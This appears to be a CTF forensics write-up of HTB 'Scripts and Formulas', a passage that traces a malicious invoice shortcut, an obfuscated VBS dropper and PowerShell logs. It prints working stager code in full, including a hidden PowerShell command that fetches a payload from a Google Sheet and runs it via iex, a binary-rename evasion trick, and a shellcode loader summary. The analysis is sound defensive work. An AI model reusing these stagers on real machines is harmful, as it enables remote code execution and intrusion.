Scripts and Formulas
This is a forensics challenge from HTB Business CTF 2023. We are given event logs from a clerk’s computer along with a malicious invoice, and tasked with reconstructing the intrusion. The challenge scenario:
After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, the UNZ hired a local geologist to examine possible sites that were used in the past for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. Being new to the job, the clerk wasn’t aware of the past situation and opened the Invoice. Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! Given some Logs from the Clerk’s Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access!
The remote service that validates the answers presents the same scenario in a banner:
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Title | Description |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
| Scripts and Formulas | After the last site UNZ used to rely on for the majority of Vitalium mining ran dry, |
| | the UNZ hired a local geologist to examine possible sites that were used in the past |
| | for secondary mining operations. However, after finishing the examinations, and the geologist was ready to hand in his reports, |
| | he mysteriously went missing! After months, a mysterious invoice regarding his examinations was brought up to the Department. |
| | Being new to the job, the clerk wasn't aware of the past situation and opened the Invoice. |
| | Now all of a sudden, the Arodor faction is really close to taking the lead on Vitalium mining! |
| | Given some Logs from the Clerk's Computer and the Invoice, pinpoint the intrusion methods used and how the Arodor faction gained access! |
+----------------------+------------------------------------------------------------------------------------------------------------------------------------------+
Files
Download: forensics_scripts_and_formulas.zip
Recon
The key artifact is Microsoft Windows Powershell Operational.evtx, which records the executed PowerShell. The malicious activity can be recovered two ways: by parsing the event logs (the exploit ran, so it is captured there), or — once the Google Sheet ID is known — by browsing to it directly by creating a new sheet and substituting the sheet ID.
To make the EVTX data searchable, we dump every event log to XML. This converts the binary EVTX format into plaintext we can grep through.
find . -name '*.evtx' -exec evtx_dump.py '{}' \; > decoded.xml
Examining the Invoice Shortcut
The lure is a Windows shortcut (.lnk) disguised as an invoice. Running strings on it reveals the embedded command line, which shows it abusing powershell.exe and masquerading alongside a WordPad path.
strings Invoice_01.lnk
/C:\
Windows
V=_.
System32
VD`.
WindowsPowerShell
v1.0
powershell.exe
VA_.
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
%ProgramFiles%\Windows NT\Accessories\wordpad.exe
maltemple
1SPS
1SPS
Tracing PowerShell Execution in the Logs
Grepping the decoded XML for powershell.exe surfaces the AppIDs, the calling process, and — most importantly — two HostApplication command lines that capture the full attack chain.
cat decoded.xml | grep 'powershell.exe' | sort -u
<Data Name="AppID">{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="AppID">{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="CallingProcess">powershell.exe</Data>
HostApplication=C:\windows\system32\windowspowershell\v1.0\powershell.exe -ep bypass -w hidden -c $url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Nop -sta -noni -w hidden -c cp C:\Windows\System32\cscript.exe .\calc.exe;.\calc.exe Invoice.vbs
The second HostApplication line is the initial stage: it copies the legitimate cscript.exe to calc.exe (a defense-evasion rename) and uses that renamed binary to run Invoice.vbs. So the program being copied/renamed is cscript.exe:calc.exe, and the program used to execute the next stage is powershell.exe.
Decoding the Stage-2 URL
The first HostApplication line base64-decodes a URL, fetches it with Invoke-RestMethod, and pulls a payload out of a Google Sheet cell. Decoding the base64 blob reveals the Google Sheets API endpoint, including the spreadsheet ID and the exact cell that holds the payload.
echo -n 'aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=' | base64 -d
https://sheets.googleapis.com/v4/spreadsheets/1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ?key=AIzaSyDUpjSf7R1l1dQohA5Qv9EdyWA3KBOMc0U&ranges=Sheet1!O37&includeGridData=true
This confirms the spreadsheet ID is 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ and the payload lives in Sheet1 cell O37. The PowerShell then base64-decodes that cell value, decompresses it with a DeflateStream, and pipes the result to iex (Invoke-Expression).
VBA Analysis
Before the PowerShell stage runs, the Invoice.vbs script orchestrates the first stage. We analyze it with olevba to deobfuscate and decode the embedded strings.
python3 /opt/gits/oletools/oletools/olevba3.py --deobf --decode ./invoice.vbs
/opt/gits/oletools/oletools/olevba3.py:7: DeprecationWarning: olevba3 is deprecated, olevba should be used instead.
warnings.warn('olevba3 is deprecated, olevba should be used instead.', DeprecationWarning)
olevba 0.60.2dev1 on Python 3.11.4 - http://decalage.info/python/oletools
===============================================================================
FILE: ./invoice.vbs
Type: Text
-------------------------------------------------------------------------------
VBA MACRO ./invoice.vbs
in file: ./invoice.vbs - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM The great power of VBA programming in Office is that nearly every operation that you can perform with a mouse, keyboard, or a dialog box can also be automated by using VBA. Further, if it can be done once with VBA, it can be done just as easily a hundred times. In fact, the automation of repetitive tasks is one of the most common uses of VBA in Office.
Function ZbVxxAHCsiTnKpIJ()
Dim yNSlalZeGAsokjsP
Dim pJmLeYiULjageWIP
Dim cMtARTHTmbqbxauA
Dim bZzPBAGNtCswuUoo
Dim QlAtSUbRwRFNlEjX
Dim objShell
Set objShell = WScript.CreateObject("WScript.Shell")
yNSlalZeGAsokjsP = LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
cMtARTHTmbqbxauA = yNSlalZeGAsokjsP & " " & LLdunAaXwVgKfowf("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) & LLdunAaXwVgKfowf("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZMUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM95nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCVcE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616rSKCoFKXmMKAb3X9aGMSsWO4e") & "64" & LLdunAaXwVgKfowf("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" & LLdunAaXwVgKfowf("ECK5'1Y)44)UQ;2F$B7rNGe7AsNGpMV J2=QG XBi1BnYNv8So3XkNKe70-CGrO6e54sU8tZ9m6Le6FtI8hX1oTJdXF DD-LGuXMrUKiLC AA$CVuEBrBJl") & LLdunAaXwVgKfowf(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8VNePHVtZ8RsMS5[") & "0" & LLdunAaXwVgKfowf("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" & LLdunAaXwVgKfowf("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" & LLdunAaXwVgKfowf("YP7aQTYtE3UaYLX[") & "0" & LLdunAaXwVgKfowf("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") & "0" & LLdunAaXwVgKfowf("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3JeYWLd") & "V" & LLdunAaXwVgKfowf("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEeOWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") & "64" & LLdunAaXwVgKfowf("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9oH0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM-SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7GiI5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDoBAd3HeXL,") & "0" & LLdunAaXwVgKfowf("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RYlTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S") & "0" & LLdunAaXwVgKfowf("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsItQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1wI-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sMsBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$OsBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVsEeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaSLGtSPXa") & "|iex" & Chr(34)
objShell.Run cMtARTHTmbqbxauA
End Function
REM Beyond the power of scripting VBA to accelerate every-day tasks, you can use VBA to add new functionality to Office applications or to prompt and interact with the user of your documents in ways that are specific to your business needs. For example, you could write some VBA code that displays a pop up message that reminds users to save a document to a particular network drive the first time they try to save it.
REM This code example shows how to take data from a worksheet and create a table of contents in an HTML file. The worksheet should have data in columns A, B, and C that correspond to the first, second, and third levels of the table of contents hierarchy. The HTML file is stored in the same working folder as the active workbook.
REM crucial for professionals across various industries. Microsoft Office, the go-to suite of productivity tools, offers a wealth of features and functionalities to enhance efficiency. However, many users are unaware of the hidden gem within Office: Visual Basic for Applications (VBA). This versatile programming language empowers users to automate tasks, customize applications, and unleash the full potential of Microsoft Office.
REM Excel, with its powerful data analysis capabilities, is a staple tool for professionals dealing with spreadsheets and calculations. VBA allows users to automate complex operations, manipulate data, and create custom functions to meet specific needs. By writing VBA code, users can streamline repetitive tasks like data entry, report generation, and data formatting. The ability to record and edit macros further simplifies the automation process, making it accessible to users without extensive programming knowledge.
REM Microsoft Word is widely used for creating documents, reports, and templates. With VBA, users can extend Word's functionality beyond its native features. VBA enables the creation of custom toolbars, buttons, and shortcuts to access frequently used commands. Users can also automate document creation by generating personalized letters, merging data from external sources, and performing advanced text manipulations. VBA provides a vast array of possibilities for automating workflows and enhancing document management.
REM While VBA might seem daunting to beginners, numerous resources are available to help users get started. Microsoft provides comprehensive documentation, tutorials, and a vibrant community of users sharing their knowledge and solutions. Online forums, blogs, and video tutorials offer practical examples and guidance for leveraging VBA in Microsoft Office applications. Additionally, recording and modifying macros is an excellent starting point for understanding VBA code and automating repetitive tasks.
REM Visual Basic for Applications (VBA) is a powerful tool that unlocks the true potential of Microsoft Office. By enabling automation, customization, and streamlining workflows, VBA empowers users to work more efficiently and effectively with Excel, Word, PowerPoint, Access, and Outlook. With its versatility and extensive capabilities, VBA provides professionals with a means to save time, reduce errors, and accomplish more in their day-to-day tasks. Embracing VBA can transform Microsoft Office into a tailored and automated productivity suite, revolutionizing the way we work.
REM VBA can transform PowerPoint into a dynamic presentation tool. Users can leverage VBA to automate the creation of slideshows, generate charts and graphs, and add interactive elements to engage the audience. By utilizing VBA, professionals can reduce the time spent on repetitive tasks such as formatting slides, applying consistent styles, and inserting multimedia content. With the ability to programmatically control every aspect of a presentation, VBA empowers users to deliver impactful and visually stunning presentations.
Function LLdunAaXwVgKfowf(t)
Dim msStr()
ReDim msStr(Len(t))
Dim jKaNZCemSwPDrmLT
jKaNZCemSwPDrmLT = ""
For i = 1 To UBound(msStr)
msStr(i) = Mid(t, i, 1)
Next
For Each qqEPRvFjIuMSmDvM In msStr
If qqEPRvFjIuMSmDvM = LCase(qqEPRvFjIuMSmDvM) And Not IsNumeric(qqEPRvFjIuMSmDvM) Then jKaNZCemSwPDrmLT = jKaNZCemSwPDrmLT + qqEPRvFjIuMSmDvM
Next
LLdunAaXwVgKfowf = jKaNZCemSwPDrmLT
End Function
REM VBA extends the capabilities of Microsoft Access and Outlook, allowing users to build powerful databases and automate email communication. In Access, VBA enables the creation of custom forms, reports, and queries, facilitating efficient data management. For Outlook, VBA offers the ability to automate email processing, organize messages into folders, and perform advanced filtering. By leveraging VBA, users can customize these applications to suit their specific needs, increasing productivity and efficiency.
Sub Main()
ZbVxxAHCsiTnKpIJ()
End Sub
Main()
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|Suspicious|write |May write to a file (if combined with Open) |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|WScript.Shell |May run an executable file or a system |
| | |command |
|Suspicious|Run |May run an executable file or a system |
| | |command |
|Suspicious|create |May execute file or a system command through |
| | |WMI |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Chr |May attempt to obfuscate specific strings |
| | |(use option --deobf to deobfuscate) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|VBA obfuscated |VBA string expressions were detected, may be |
| |Strings |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://sheets.googl|URL (obfuscation: Base64) |
| |eapis.com/v4/spreads| |
| |heets/1HpB4GqqYwI6X7| |
| |1z4p2EK88FoJjrsW2DKb| |
| |Skx-ro5lQQ?key=AIzaS| |
| |yDUpjSf7R1l1dQohA5Qv| |
| |9EdyWA3KBOMc0U&range| |
| |s=Sheet1 | |
|Base64 |https://sheets.googl|aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc|
|String |eapis.com/v4/spreads|3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSz|
| |heets/1HpB4GqqYwI6X7|g4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3l|
| |1z4p2EK88FoJjrsW2DKb|EVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUm|
| |Skx-ro5lQQ?key=AIzaS|cmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhP|
| |yDUpjSf7R1l1dQohA5Qv|XRydWU= |
| |9EdyWA3KBOMc0U&range| |
| |s=Sheet1!O37&include| |
| |GridData=true | |
|VBA string|BcV:L\XwFiInDdDoXw7s|("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32"|
| |1\9sNy4sIt9eGm32 | |
|VBA string|V312I\OwFiPnDdJo0wVs|("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\E|
| |Dp7oFw7e6r5sBhCeTl1l|v81IU04") & "1.0" |
| |B\Ev81IU041.0 | |
|VBA string|EK-MMe4RpHW |("EK-MMe4RpHW JIb9FyG7pSZaQ6s56sYB IN-4XwMT |
| |JIb9FyG7pSZaQ6s56sYB|OThL2i64dSGdEXe0CnNE 9Q-X6c4V ") & Chr(34) |
| |IN-4XwMT | |
| |OThL2i64dSGdEXe0CnNE| |
| |9Q-X6c4V " | |
|VBA string|M0F$BWQuEKRrCBAlAY9 |("M0F$BWQuEKRrCBAlAY9 1JQ=65V QTL[KTCsEMKyRE4|
| |1JQ=65V QTL[KTCsEMKy|sTJ3tMY0eQAVmF9E.60Qt7KEeZTUxXD6t0LC.CF9eXAWn|
| |RE4sTJ3tMY0eQAVmF9E.|5HDcGMSoZOFdT2KiCQ3n0KNgFUN]5YP:3PY:BLLaQ2VsZ|
| |60Qt7KEeZTUxXD6t0LC.|MUcJAYi4MXiKCX.4I8gY2Ae0YItJYKsU8MtLZ9rMUZiM9|
| |CF9eXAWn5HDcGMSoZOFd|5nJH4gTDX(HZP[H4RsWZ7yOCKsMX2tNWIe02ZmOH8.BCV|
| |T2KiCQ3n0KNgFUN]5YP:|cE9SoAXHnP9QvDXJe3CJrD51t2LE]C2L:0M2:I66f616r|
| |3PY:BLLaQ2VsZMUcJAYi|SKCoFKXmMKAb3X9aGMSsWO4e") & "64" |
| |4MXiKCX.4I8gY2Ae0YIt| |
| |JYKsU8MtLZ9rMUZiM95n| |
| |JH4gTDX(HZP[H4RsWZ7y| |
| |OCKsMX2tNWIe02ZmOH8.| |
| |BCVcE9SoAXHnP9QvDXJe| |
| |3CJrD51t2LE]C2L:0M2:| |
| |I66f616rSKCoFKXmMKAb| |
| |3X9aGMSsWO4e64 | |
|VBA string|E1sFUtLBrDIiTXn9NgZG|("E1sFUtLBrDIiTXn9NgZG(ED'88") & "aHR0cHM6Ly9|
| |(ED'88aHR0cHM6Ly9zaG|zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hl|
| |VldHMuZ29vZ2xlYXBpcy|ZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzV|
| |5jb20vdjQvc3ByZWFkc2|zJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3Uj|
| |hlZXRzLzFIcEI0R3FxWX|FsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVN|
| |dJNlg3MXo0cDJFSzg4Rm|oZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU=" |
| |9KanJzVzJES2JTa3gtcm| |
| |81bFFRP2tleT1BSXphU3| |
| |lEVXBqU2Y3UjFsMWRRb2| |
| |hBNVF2OUVkeVdBM0tCT0| |
| |1jMFUmcmFuZ2VzPVNoZW| |
| |V0MSFPMzcmaW5jbHVkZU| |
| |dyaWREYXRhPXRydWU= | |
|VBA string|;VQI$WN2pV0XaRDAyTQD|(";VQI$WN2pV0XaRDAyTQDlB8RoMOWaMQ9d71C |
| |lB8RoMOWaMQ9d71C |I1G=XC1 JBM$XOFrSGBeL3Qs7HNp9ZG.DH0sOC1hQ15e8|
| |I1G=XC1 JBM$XOFrSGBe|VNePHVtZ8RsMS5[") & "0" |
| |L3Qs7HNp9ZG.DH0sOC1h| |
| |Q15e8VNePHVtZ8RsMS5[| |
| |0 | |
|VBA string|7010HGS]F6H.JTWdB0Na|("7010HGS]F6H.JTWdB0Na3CHtT27aW5W[") & "0" |
| |3CHtT27aW5W[0 | |
|VBA string|7Z10CS0]V4E.9H0rRO1o|("7Z10CS0]V4E.9H0rRO1oHJEw") & "D" |
| |HJEwD | |
|VBA string|YP7aQTYtE3UaYLX[0 |("YP7aQTYtE3UaYLX[") & "0" |
|VBA string|OPI0J12]JUK.TK7v7J0a|("OPI0J12]JUK.TK7v7J0aRTGl9B2uFO7eV11sOEC[") |
| |RTGl9B2uFO7eV11sOEC[|& "0" |
| |0 | |
|VBA string|VKB0X4U]VO2.ZMIf4FIo|("VKB0X4U]VO2.ZMIf4FIoD02r82Mm5NNaNIVt2Z4tH3J|
| |D02r82Mm5NNaNIVt2Z4t|eYWLd") & "V" |
| |H3JeYWLdV | |
|VBA string|F2aESlKEuR0e5Y;R4$UA|("F2aESlKEuR0e5Y;R4$UAdZIeBIcL5o51dPXeEW |
| |dZIeBIcL5o51dPXeEW |CK=4Q LS[M8sYHyE3s82t6YeAXmB2.12cXZo2PnZKvYEe|
| |CK=4Q LS[M8sYHyE3s82|OWrK9tQN]YQ:QQ:RZfK6rJIoQVmRRbBUa6RsHOeUZ") &|
| |t6YeAXmB2.12cXZo2PnZ|"64" |
| |KvYEeOWrK9tQN]YQ:QQ:| |
| |RZfK6rJIoQVmRRbBUa6R| |
| |sHOeUZ64 | |
|VBA string|6934MPsZAt50rIFiUYn6|("6934MPsZAt50rIFiUYn6Sg46(HG$JFpE7aNAyVHlL9o|
| |Sg46(HG$JFpE7aNAyVHl|H0aQNdUX)VA;XK$YEmM4s59 87=PT FHnETe61wYM- |
| |L9oH0aQNdUX)VA;XK$YE|SYo5Bb6VjHPe3DcHQtET 7SsQ0yIKs6Pt71eBTmJQ.7Gi|
| |mM4s59 87=PT |I5oT4.SDmUQeVDmAMoRZrUGyGAsG1tK7rM9ePMaUQmTT;|
| |FHnETe61wYM- |YF$Z1mWTsIZ.5Ww4CrBZi1CtCNeTU(W0$0LdFXe2HcDDo|
| |SYo5Bb6VjHPe3DcHQtET|BAd3HeXL,") & "0" |
| |7SsQ0yIKs6Pt71eBTmJQ| |
| |.7GiI5oT4.SDmUQeVDmA| |
| |MoRZrUGyGAsG1tK7rM9e| |
| |PMaUQmTT;YF$Z1mWTsIZ| |
| |.5Ww4CrBZi1CtCNeTU(W| |
| |0$0LdFXe2HcDDoBAd3He| |
| |XL,0 | |
|VBA string|Q8Z,409 12M$S2Zd5JAe|("Q8Z,409 12M$S2Zd5JAeVHYc6DNoEOCdEZZeOVB.9RY|
| |VHYc6DNoEOCdEZZeOVB.|lTD3eP6HnB29g1VYtHC2hHIN)FND;20Z$KJ5mJZYsFHJ.|
| |9RYlTD3eP6HnB29g1VYt|I28p0VYo48Gs1V9i91DtEPNiLLUoP49n000 DC8=F7S")|
| |HC2hHIN)FND;20Z$KJ5m|& "0" |
| |JZYsFHJ.I28p0VYo48Gs| |
| |1V9i91DtEPNiLLUoP49n| |
| |000 DC8=F7S0 | |
|VBA string|1;2$Fs1rV C=W |("1;2$Fs1rV C=W Dn8e7wB-YoMbAjXeIc4tY SsFyAsI|
| |Dn8e7wB- |tQeNmI.8iQoY.WsGt2rBe5aDm3rReEaBdPeArR(1nCe1w|
| |YoMbAjXeIc4tY SsFyAs|I-RoPbMjNeDcWt6 BsJy7sNt2eEm5.SiZoQ.JcKoMmYp8|
| |ItQeNmI.8iQoY.WsGt2r|rWeDs6sZiWoRn0.TdPe8f6lIaYtJeXsBt2rDeHaNmF(3$|
| |Be5aDm3rReEaBdPeArR(|NmRsO,7 M[AsQyPsKt9e7mR.Hi5oD.WcEoNmDp5rRe8sM|
| |1nCe1wI- |sBi4oMn1.8cLoSmQpPrHeIsCsJi2oMnEmHo5dCeA]6:X:|
| |RoPbMjNeDcWt6 BsJy7s|IdEeMcRoQmLpGr1eIs4sY)T)F;A$Md7aDtXaM F=B W$O|
| |Nt2eEm5.SiZoQ.JcKoMm|sBrH.CrWeWaVdKtXo2eAnAd1(P)E;K$Gs7r2.2cYlZoVs|
| |Yp8rWeDs6sZiWoRn0.Td|EeM(O)0;I$Tm0sB.YcHlNoXs6eO(P)0;IWP$TIVd5MUaS|
| |Pe8f6lIaYtJeXsBt2rDe|LGtSPXa") & "|iex" & Chr(34) |
| |HaNmF(3$NmRsO,7 M[As| |
| |QyPsKt9e7mR.Hi5oD.Wc| |
| |EoNmDp5rRe8sMsBi4oMn| |
| |1.8cLoSmQpPrHeIsCsJi| |
| |2oMnEmHo5dCeA]6:X:Id| |
| |EeMcRoQmLpGr1eIs4sY)| |
| |T)F;A$Md7aDtXaM F=B | |
| |W$OsBrH.CrWeWaVdKtXo| |
| |2eAnAd1(P)E;K$Gs7r2.| |
| |2cYlZoVsEeM(O)0;I$Tm| |
| |0sB.YcHlNoXs6eO(P)0;| |
| |IWP$TIVd5MUaSLGtSPXa| |
| ||iex" | |
+----------+--------------------+---------------------------------------------+
The deobfuscation function in this VBS script is LLdunAaXwVgKfowf. It works by iterating over each character of its input and keeping only the lowercase, non-numeric characters — effectively hiding the real string among uppercase noise. We can see it being used to rebuild the path to powershell.exe and the full -c ... |iex command:
LLdunAaXwVgKfowf("BcV:L\XwFiInDdDoXw7s1\9sNy4sIt9eGm") & "32" & LLdunAaXwVgKfowf("V312I\OwFiPnDdJo0wVsDp7oFw7e6r5sBhCeTl1lB\Ev81IU04") & "1.0" & LLdunAaXwVgKfowf("\9pMoBw7eTrMsDhKeVlOl1.WeMxUe")
Powershell Runtime
The PowerShell Operational log captures script block logging under Event ID 4104, which records the actual deobfuscated script blocks as they execute. The first relevant 4104 event is the stage-2 downloader that fetches the Google Sheet payload and pipes it to iex.
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:23.795862"></TimeCreated>
<EventRecordID>78</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0002-a13f-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">$url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex</Data>
<Data Name="ScriptBlockId">f1ad07f1-15f1-4992-a4da-3ffdc54c6077</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
The second 4104 event is the final stage that was retrieved from the spreadsheet: a classic reflective shellcode loader. It defines func_get_proc_address / func_get_delegate_type to resolve VirtualAlloc from kernel32.dll, allocates RWX memory, copies in the decoded bytes, and invokes them. Crucially, the shellcode is base64-decoded and then XOR-decrypted byte-by-byte with the key 35 (the -bxor 35 loop).
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:24.761370"></TimeCreated>
<EventRecordID>79</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0004-ba44-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
